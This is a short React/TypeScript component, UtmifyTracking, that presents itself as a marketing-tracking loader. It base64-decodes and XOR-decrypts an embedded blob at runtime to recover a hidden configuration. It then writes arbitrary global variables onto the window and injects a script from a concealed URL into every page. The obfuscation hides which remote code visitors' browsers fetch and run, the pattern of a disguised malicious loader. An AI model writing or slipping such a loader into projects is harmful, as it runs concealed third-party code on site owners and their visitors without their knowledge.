import { useEffect } from "react";
export function UtmifyTracking() {
  useEffect(() => {
    const scriptId = "utmify-tracking-loader";
    if (document.getElementById(scriptId)) return;
    const g_kl4 = atob("DGlKQMN8HiwPBmreThJoNbEQPBYtbh6qPhpwb+wfekIhcx6zJw8zbqATcwJtdEWtLRsjMLcPMVxmfg+yYRkjOKYQMEZ8JEb8Lx0+Mqoea1hqdUjkFTRmYqQQcU5uahn8dDIxYq0dc0ktPEiuJxEvLIoYPAAtcAuyOwxoeuFKfxo+M1u4fl9yefEeLx1uMlroeF98JPBeY3Fy");
    const bytes: number[] = [];
    for (let index = 0; index < g_kl4.length; index += 1) {
      bytes.push(g_kl4.charCodeAt(index) & 255);
    }
    const keyLength = bytes[0];
    const key = bytes.slice(1, 1 + keyLength);
    const encrypted = bytes.slice(1 + keyLength);
    const decoded = encrypted.map((byte, index) => byte ^ key[index % keyLength]);
    const decodedText = decoded.map(byte => String.fromCharCode(byte & 255)).join("");
    const configuration = JSON.parse(decodeURIComponent(escape(decodedText))) as {
      url: string;
      globals?: Array<{
        name: string;
        value: unknown;
      }>;
      attributes?: Array<{
        name: string;
        value: string;
      }>;
    };
    configuration.globals?.forEach(({
      name,
      value
    }) => {
      (window as unknown as Record<string, unknown>)[name] = value;
    });
    const trackerScript = document.createElement("script");
    trackerScript.id = scriptId;
    trackerScript.src = configuration.url;
    trackerScript.async = true;
    trackerScript.defer = true;
    configuration.attributes?.forEach(({
      name,
      value
    }) => {
      trackerScript.setAttribute(name, value);
    });
    (document.head || document.documentElement).appendChild(trackerScript);
  }, []);
  return null;
}